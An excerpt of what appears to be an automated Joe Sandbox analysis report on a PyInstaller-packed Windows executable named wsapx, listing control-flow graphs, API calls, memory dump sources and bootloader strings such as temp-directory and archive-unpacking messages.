7ff7c71b8ef0-7ff7c71b8f28 MsgWaitForMultipleObjects PeekMessageW 43->53 44->45 45->37 46 7ff7c71b8e14-7ff7c71b8e31 PeekMessageW 45->46 54 7ff7c71b8e66-7ff7c71b8e76 WaitForSingleObject 46->54 55 7ff7c71b8e33-7ff7c71b8e64 TranslateMessage DispatchMessageW PeekMessageW 46->55 47->40 47->42 48->47 49->31 50->49 51->40 52->51 56 7ff7c71b8f63-7ff7c71b8f6a 53->56 57 7ff7c71b8f2a 53->57 54->34 54->39 55->54 55->55 56->42 59 7ff7c71b8f6c-7ff7c71b8f95 QueryPerformanceCounter 56->59 58 7ff7c71b8f30-7ff7c71b8f61 TranslateMessage DispatchMessageW PeekMessageW 57->58 58->56 58->58 59->53 60 7ff7c71b8f9b-7ff7c71b8fa2 59->60 60->40 61 7ff7c71b8fa4-7ff7c71b8fa8 60->61 61->42
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction ID: 8708c9eeda6aeecd6e7cc5af4ea216f2604f4827efad2045f871fd21554d827b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69D19432A08A4287EB21AF75F8942A9B761FBD4F68F804235DE5E43A94DF3CD146C750

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 62 7ff7c71b1000-7ff7c71b3806 call 7ff7c71bfe88 call 7ff7c71bfe90 call 7ff7c71bc8c0 call 7ff7c71c5460 call 7ff7c71c54f4 call 7ff7c71b36b0 76 7ff7c71b3814-7ff7c71b3836 call 7ff7c71b1950 62->76 77 7ff7c71b3808-7ff7c71b380f 62->77 83 7ff7c71b391b-7ff7c71b3931 call 7ff7c71b45b0 76->83 84 7ff7c71b383c-7ff7c71b3856 call 7ff7c71b1c80 76->84 78 7ff7c71b3c97-7ff7c71b3cb2 call 7ff7c71bc5c0 77->78 89 7ff7c71b3933-7ff7c71b3960 call 7ff7c71b7f80 83->89 90 7ff7c71b396a-7ff7c71b397f call 7ff7c71b2710 83->90 88 7ff7c71b385b-7ff7c71b389b call 7ff7c71b8a20 84->88 97 7ff7c71b38c1-7ff7c71b38cc call 7ff7c71c4fa0 88->97 98 7ff7c71b389d-7ff7c71b38a3 88->98 100 7ff7c71b3962-7ff7c71b3965 call 7ff7c71c00bc 89->100 101 7ff7c71b3984-7ff7c71b39a6 call 7ff7c71b1c80 89->101 102 7ff7c71b3c8f 90->102 110 7ff7c71b38d2-7ff7c71b38e1 call 7ff7c71b8a20 97->110 111 7ff7c71b39fc-7ff7c71b3a2a call 7ff7c71b8b30 call 7ff7c71b8b90 * 3 97->111 103 7ff7c71b38af-7ff7c71b38bd call 7ff7c71b8b90 98->103 104 7ff7c71b38a5-7ff7c71b38ad 98->104 100->90 115 7ff7c71b39b0-7ff7c71b39b9 101->115 102->78 103->97 104->103 119 7ff7c71b39f4-7ff7c71b39f7 call 7ff7c71c4fa0 110->119 120 7ff7c71b38e7-7ff7c71b38ed 110->120 138 7ff7c71b3a2f-7ff7c71b3a3e call 7ff7c71b8a20 111->138 115->115 118 7ff7c71b39bb-7ff7c71b39d8 call 7ff7c71b1950 115->118 118->88 127 7ff7c71b39de-7ff7c71b39ef call 7ff7c71b2710 118->127 119->111 124 7ff7c71b38f0-7ff7c71b38fc 120->124 128 7ff7c71b3905-7ff7c71b3908 124->128 129 7ff7c71b38fe-7ff7c71b3903 124->129 127->102 128->119 132 7ff7c71b390e-7ff7c71b3916 call 7ff7c71c4fa0 128->132 129->124 129->128 132->138 141 7ff7c71b3b45-7ff7c71b3b53 138->141 142 7ff7c71b3a44-7ff7c71b3a47 138->142 144 7ff7c71b3b59-7ff7c71b3b5d 141->144 145 7ff7c71b3a67 141->145 142->141 143 7ff7c71b3a4d-7ff7c71b3a50 142->143 146 7ff7c71b3a56-7ff7c71b3a5a 143->146 147 7ff7c71b3b14-7ff7c71b3b17 143->147 148 7ff7c71b3a6b-7ff7c71b3a90 call 7ff7c71c4fa0 144->148 145->148 146->147 149 7ff7c71b3a60 146->149 150 7ff7c71b3b2f-7ff7c71b3b40 call 7ff7c71b2710 147->150 151 7ff7c71b3b19-7ff7c71b3b1d 147->151 157 7ff7c71b3a92-7ff7c71b3aa6 call 7ff7c71b8b30 148->157 158 7ff7c71b3aab-7ff7c71b3ac0 148->158 149->145 159 7ff7c71b3c7f-7ff7c71b3c87 150->159 151->150 153 7ff7c71b3b1f-7ff7c71b3b2a 151->153 153->148 157->158 161 7ff7c71b3ac6-7ff7c71b3aca 158->161 162 7ff7c71b3be8-7ff7c71b3bfa call 7ff7c71b8a20 158->162 159->102 164 7ff7c71b3ad0-7ff7c71b3ae8 call 7ff7c71c52c0 161->164 165 7ff7c71b3bcd-7ff7c71b3be2 call 7ff7c71b1940 161->165 170 7ff7c71b3c2e 162->170 171 7ff7c71b3bfc-7ff7c71b3c02 162->171 176 7ff7c71b3b62-7ff7c71b3b7a call 7ff7c71c52c0 164->176 177 7ff7c71b3aea-7ff7c71b3b02 call 7ff7c71c52c0 164->177 165->161 165->162 173 7ff7c71b3c31-7ff7c71b3c40 call 7ff7c71c4fa0 170->173 174 7ff7c71b3c04-7ff7c71b3c1c 171->174 175 7ff7c71b3c1e-7ff7c71b3c2c 171->175 185 7ff7c71b3d41-7ff7c71b3d63 call 7ff7c71b44d0 173->185 186 7ff7c71b3c46-7ff7c71b3c4a 173->186 174->173 175->173 187 7ff7c71b3b87-7ff7c71b3b9f call 7ff7c71c52c0 176->187 188 7ff7c71b3b7c-7ff7c71b3b80 176->188 177->165 184 7ff7c71b3b08-7ff7c71b3b0f 177->184 184->165 201 7ff7c71b3d71-7ff7c71b3d82 call 7ff7c71b1c80 185->201 202 7ff7c71b3d65-7ff7c71b3d6f call 7ff7c71b4620 185->202 190 7ff7c71b3c50-7ff7c71b3c5f call 7ff7c71b90e0 186->190 191 7ff7c71b3cd4-7ff7c71b3ce6 call 7ff7c71b8a20 186->191 197 7ff7c71b3ba1-7ff7c71b3ba5 187->197 198 7ff7c71b3bac-7ff7c71b3bc4 call 7ff7c71c52c0 187->198 188->187 204 7ff7c71b3c61 190->204 205 7ff7c71b3cb3-7ff7c71b3cb6 call 7ff7c71b8850 190->205 206 7ff7c71b3d35-7ff7c71b3d3c 191->206 207 7ff7c71b3ce8-7ff7c71b3ceb 191->207 197->198 198->165 217 7ff7c71b3bc6 198->217 215 7ff7c71b3d87-7ff7c71b3d96 201->215 202->215 212 7ff7c71b3c68 call 7ff7c71b2710 204->212 216 7ff7c71b3cbb-7ff7c71b3cbd 205->216 206->212 207->206 213 7ff7c71b3ced-7ff7c71b3d10 call 7ff7c71b1c80 207->213 226 7ff7c71b3c6d-7ff7c71b3c77 212->226 230 7ff7c71b3d12-7ff7c71b3d26 call 7ff7c71b2710 call 7ff7c71c4fa0 213->230 231 7ff7c71b3d2b-7ff7c71b3d33 call 7ff7c71c4fa0 213->231 220 7ff7c71b3dc4-7ff7c71b3dda call 7ff7c71b9400 215->220 221 7ff7c71b3d98-7ff7c71b3d9f 215->221 224 7ff7c71b3cbf-7ff7c71b3cc6 216->224 225 7ff7c71b3cc8-7ff7c71b3ccf 216->225 217->165 233 7ff7c71b3de8-7ff7c71b3e04 SetDllDirectoryW 220->233 234 7ff7c71b3ddc 220->234 221->220 222 7ff7c71b3da1-7ff7c71b3da5 221->222 222->220 228 7ff7c71b3da7-7ff7c71b3dbe SetDllDirectoryW LoadLibraryExW 222->228 224->212 225->215 226->159 228->220 230->226 231->215 237 7ff7c71b3f01-7ff7c71b3f08 233->237 238 7ff7c71b3e0a-7ff7c71b3e19 call 7ff7c71b8a20 233->238 234->233 241 7ff7c71b3f0e-7ff7c71b3f15 237->241 242 7ff7c71b3ffc-7ff7c71b4004 237->242 251 7ff7c71b3e32-7ff7c71b3e3c call 7ff7c71c4fa0 238->251 252 7ff7c71b3e1b-7ff7c71b3e21 238->252 241->242 245 7ff7c71b3f1b-7ff7c71b3f25 call 7ff7c71b33c0 241->245 246 7ff7c71b4006-7ff7c71b4023 PostMessageW GetMessageW 242->246 247 7ff7c71b4029-7ff7c71b405b call 7ff7c71b36a0 call 7ff7c71b3360 call 7ff7c71b3670 call 7ff7c71b6fb0 call 7ff7c71b6d60 242->247 245->226 259 7ff7c71b3f2b-7ff7c71b3f3f call 7ff7c71b90c0 245->259 246->247 261 7ff7c71b3ef2-7ff7c71b3efc call 7ff7c71b8b30 251->261 262 7ff7c71b3e42-7ff7c71b3e48 251->262 255 7ff7c71b3e23-7ff7c71b3e2b 252->255 256 7ff7c71b3e2d-7ff7c71b3e2f 252->256 255->256 256->251 271 7ff7c71b3f41-7ff7c71b3f5e PostMessageW GetMessageW 259->271 272 7ff7c71b3f64-7ff7c71b3fa0 call 7ff7c71b8b30 call 7ff7c71b8bd0 call 7ff7c71b6fb0 call 7ff7c71b6d60 call 7ff7c71b8ad0 259->272 261->237 262->261 266 7ff7c71b3e4e-7ff7c71b3e54 262->266 269 7ff7c71b3e5f-7ff7c71b3e61 266->269 270 7ff7c71b3e56-7ff7c71b3e58 266->270 269->237 275 7ff7c71b3e67-7ff7c71b3e83 call 7ff7c71b6db0 call 7ff7c71b7330 269->275 274 7ff7c71b3e5a 270->274 270->275 271->272 307 7ff7c71b3fa5-7ff7c71b3fa7 272->307 274->237 290 7ff7c71b3e85-7ff7c71b3e8c 275->290 291 7ff7c71b3e8e-7ff7c71b3e95 275->291 293 7ff7c71b3edb-7ff7c71b3ef0 call 7ff7c71b2a50 call 7ff7c71b6fb0 call 7ff7c71b6d60 290->293 294 7ff7c71b3eaf-7ff7c71b3eb9 call 7ff7c71b71a0 291->294 295 7ff7c71b3e97-7ff7c71b3ea4 call 7ff7c71b6df0 291->295 293->237 305 7ff7c71b3ec4-7ff7c71b3ed2 call 7ff7c71b74e0 294->305 306 7ff7c71b3ebb-7ff7c71b3ec2 294->306 295->294 304 7ff7c71b3ea6-7ff7c71b3ead 295->304 304->293 305->237 318 7ff7c71b3ed4 305->318 306->293 310 7ff7c71b3fe9-7ff7c71b3ff7 call 7ff7c71b1900 307->310 311 7ff7c71b3fa9-7ff7c71b3fb3 call 7ff7c71b9200 307->311 310->226 311->310 321 7ff7c71b3fb5-7ff7c71b3fca 311->321 318->293 322 7ff7c71b3fe4 call 7ff7c71b2a50 321->322 323 7ff7c71b3fcc-7ff7c71b3fdf call 7ff7c71b2710 call 7ff7c71b1900 321->323 322->310 323->226
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                • Opcode ID: 2a96b31381e5ad76f6c9c800fc25db96848fede942b56e2c9c68fa3cb0d42264
                                                                                                                                                                                                                                                • Instruction ID: 8a0433d2a297f1ae2080a340be932a6bcead0bd754eeb409eb830f4b06b84214
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a96b31381e5ad76f6c9c800fc25db96848fede942b56e2c9c68fa3cb0d42264
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC329FA1A0868293FB25BF25B4552B9E651EFD4FA0FC44432DE5D432C6DF2CE56AC320

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 536 7ff7c71d69d4-7ff7c71d6a47 call 7ff7c71d6708 539 7ff7c71d6a61-7ff7c71d6a6b call 7ff7c71c8590 536->539 540 7ff7c71d6a49-7ff7c71d6a52 call 7ff7c71c4f58 536->540 545 7ff7c71d6a86-7ff7c71d6aef CreateFileW 539->545 546 7ff7c71d6a6d-7ff7c71d6a84 call 7ff7c71c4f58 call 7ff7c71c4f78 539->546 547 7ff7c71d6a55-7ff7c71d6a5c call 7ff7c71c4f78 540->547 549 7ff7c71d6af1-7ff7c71d6af7 545->549 550 7ff7c71d6b6c-7ff7c71d6b77 GetFileType 545->550 546->547 564 7ff7c71d6da2-7ff7c71d6dc2 547->564 553 7ff7c71d6b39-7ff7c71d6b67 GetLastError call 7ff7c71c4eec 549->553 554 7ff7c71d6af9-7ff7c71d6afd 549->554 556 7ff7c71d6b79-7ff7c71d6bb4 GetLastError call 7ff7c71c4eec CloseHandle 550->556 557 7ff7c71d6bca-7ff7c71d6bd1 550->557 553->547 554->553 562 7ff7c71d6aff-7ff7c71d6b37 CreateFileW 554->562 556->547 570 7ff7c71d6bba-7ff7c71d6bc5 call 7ff7c71c4f78 556->570 560 7ff7c71d6bd3-7ff7c71d6bd7 557->560 561 7ff7c71d6bd9-7ff7c71d6bdc 557->561 567 7ff7c71d6be2-7ff7c71d6c37 call 7ff7c71c84a8 560->567 561->567 568 7ff7c71d6bde 561->568 562->550 562->553 575 7ff7c71d6c56-7ff7c71d6c87 call 7ff7c71d6488 567->575 576 7ff7c71d6c39-7ff7c71d6c45 call 7ff7c71d6910 567->576 568->567 570->547 581 7ff7c71d6c8d-7ff7c71d6ccf 575->581 582 7ff7c71d6c89-7ff7c71d6c8b 575->582 576->575 583 7ff7c71d6c47 576->583 585 7ff7c71d6cf1-7ff7c71d6cfc 581->585 586 7ff7c71d6cd1-7ff7c71d6cd5 581->586 584 7ff7c71d6c49-7ff7c71d6c51 call 7ff7c71cab30 582->584 583->584 584->564 589 7ff7c71d6da0 585->589 590 7ff7c71d6d02-7ff7c71d6d06 585->590 586->585 588 7ff7c71d6cd7-7ff7c71d6cec 586->588 588->585 589->564 590->589 592 7ff7c71d6d0c-7ff7c71d6d51 CloseHandle CreateFileW 590->592 593 7ff7c71d6d53-7ff7c71d6d81 GetLastError call 7ff7c71c4eec call 7ff7c71c86d0 592->593 594 7ff7c71d6d86-7ff7c71d6d9b 592->594 593->594 594->589
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction ID: 8f976919f97738e0c6914738063a1009788b273b3c4705686e7d387d067904c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09C1D332B28A4186EB11EFA9E4902AC7771F799FA8B414225DE2E577D4CF38E512C710

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B841B
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B849E
                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84BD
                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84CB
                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84DC
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84E5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction ID: 03cd2494af196f309b8c586f0a0ecbf1177fb2e78981d939d22f52a89805784c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69413071A0C54286EB20BF15F4886B9A3A1FBD4F64FC00636D99E42694DE3CD54B8B60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction ID: ee5f7b41a779f1b103c57a755e9006fa80703bf78b4dcbba2fcb032095924202
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F04472A18641C7F760AF64B49976AA750ABC4B74F844335D96D026D4DF3CD14E8A10
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                                                • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                • Instruction ID: c5ece680f8aeb8dbd291738ef76595484f547bc70dbaca88fd315c87f5525176
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5802CC21A1D65247FA66BF11B885279A680AFD5FB0FD98234DE5D473D2DE3CE8038720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 329 7ff7c71b1950-7ff7c71b198b call 7ff7c71b45b0 332 7ff7c71b1991-7ff7c71b19d1 call 7ff7c71b7f80 329->332 333 7ff7c71b1c4e-7ff7c71b1c72 call 7ff7c71bc5c0 329->333 338 7ff7c71b19d7-7ff7c71b19e7 call 7ff7c71c0744 332->338 339 7ff7c71b1c3b-7ff7c71b1c3e call 7ff7c71c00bc 332->339 344 7ff7c71b19e9-7ff7c71b1a03 call 7ff7c71c4f78 call 7ff7c71b2910 338->344 345 7ff7c71b1a08-7ff7c71b1a24 call 7ff7c71c040c 338->345 343 7ff7c71b1c43-7ff7c71b1c4b 339->343 343->333 344->339 350 7ff7c71b1a45-7ff7c71b1a5a call 7ff7c71c4f98 345->350 351 7ff7c71b1a26-7ff7c71b1a40 call 7ff7c71c4f78 call 7ff7c71b2910 345->351 359 7ff7c71b1a7b-7ff7c71b1afc call 7ff7c71b1c80 * 2 call 7ff7c71c0744 350->359 360 7ff7c71b1a5c-7ff7c71b1a76 call 7ff7c71c4f78 call 7ff7c71b2910 350->360 351->339 371 7ff7c71b1b01-7ff7c71b1b14 call 7ff7c71c4fb4 359->371 360->339 374 7ff7c71b1b35-7ff7c71b1b4e call 7ff7c71c040c 371->374 375 7ff7c71b1b16-7ff7c71b1b30 call 7ff7c71c4f78 call 7ff7c71b2910 371->375 381 7ff7c71b1b6f-7ff7c71b1b8b call 7ff7c71c0180 374->381 382 7ff7c71b1b50-7ff7c71b1b6a call 7ff7c71c4f78 call 7ff7c71b2910 374->382 375->339 389 7ff7c71b1b8d-7ff7c71b1b99 call 7ff7c71b2710 381->389 390 7ff7c71b1b9e-7ff7c71b1bac 381->390 382->339 389->339 390->339 393 7ff7c71b1bb2-7ff7c71b1bb9 390->393 395 7ff7c71b1bc1-7ff7c71b1bc7 393->395 396 7ff7c71b1be0-7ff7c71b1bef 395->396 397 7ff7c71b1bc9-7ff7c71b1bd6 395->397 396->396 398 7ff7c71b1bf1-7ff7c71b1bfa 396->398 397->398 399 7ff7c71b1c0f 398->399 400 7ff7c71b1bfc-7ff7c71b1bff 398->400 402 7ff7c71b1c11-7ff7c71b1c24 399->402 400->399 401 7ff7c71b1c01-7ff7c71b1c04 400->401 401->399 403 7ff7c71b1c06-7ff7c71b1c09 401->403 404 7ff7c71b1c26 402->404 405 7ff7c71b1c2d-7ff7c71b1c39 402->405 403->399 406 7ff7c71b1c0b-7ff7c71b1c0d 403->406 404->405 405->339 405->395 406->402
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B7F80: _fread_nolock.LIBCMT ref: 00007FF7C71B802A
                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF7C71B1A1B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
